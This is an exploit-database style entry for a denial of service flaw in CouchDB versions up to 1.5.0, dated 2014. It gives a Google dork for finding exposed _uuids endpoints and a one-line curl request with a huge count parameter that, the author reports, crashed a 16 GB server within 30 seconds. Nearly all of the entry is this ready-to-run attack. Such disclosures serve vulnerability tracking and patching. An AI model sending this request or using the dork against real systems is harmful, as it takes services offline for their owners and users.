CouchDB versions up to 1.5.0 suffer from a denial of service vulnerability.
c6a608654fa5592ef05092fa31b0f667e9d283fcfdd700bc26d2fcc069fe40e6
# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: https://couchdb.apache.org/
# Software Link: https://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0
HOW TO
======
curl https://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999
TEST
====
Tested on a 16G RAM Quadcore server. Couchdb dead on 30 seconds with only one GET request.